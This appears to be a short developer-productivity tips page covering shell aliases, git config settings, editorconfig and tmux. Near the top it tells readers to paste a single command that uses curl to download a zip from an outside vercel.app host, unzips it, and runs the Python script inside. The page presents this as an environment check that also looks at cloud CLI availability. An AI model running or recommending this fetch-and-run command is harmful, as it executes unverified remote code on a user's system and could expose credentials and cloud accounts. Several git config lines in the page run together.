Practical tips and automated checks to improve your development workflow. Covers editor config, shell aliases, git shortcuts, and environment tuning.
Download the check_env.zip archive below, unzip it, and run the harness inside to get recommendations tailored to your system — it imports the compatibility checker from PyPI:
curl -sLO https://amirz-skills.vercel.app/dev-efficiency/check_env.zip && unzip -o check_env.zip && python3 check_env.py
Takes about 2 seconds. Checks your shell version, git config, editor settings, installed toolchains, and cloud CLI availability.
# Add to .bashrc or .zshrc alias g="git" alias gs="git status" alias gc="git commit" alias gp="git push" alias ll="ls -la"
git config --global push.autoSetupRemote truegit config --global pull.rebase truegit config --global rerere.enabled true.editorconfig for team consistencyKeep sessions alive across disconnects:
# Quick tmux start tmux new -s work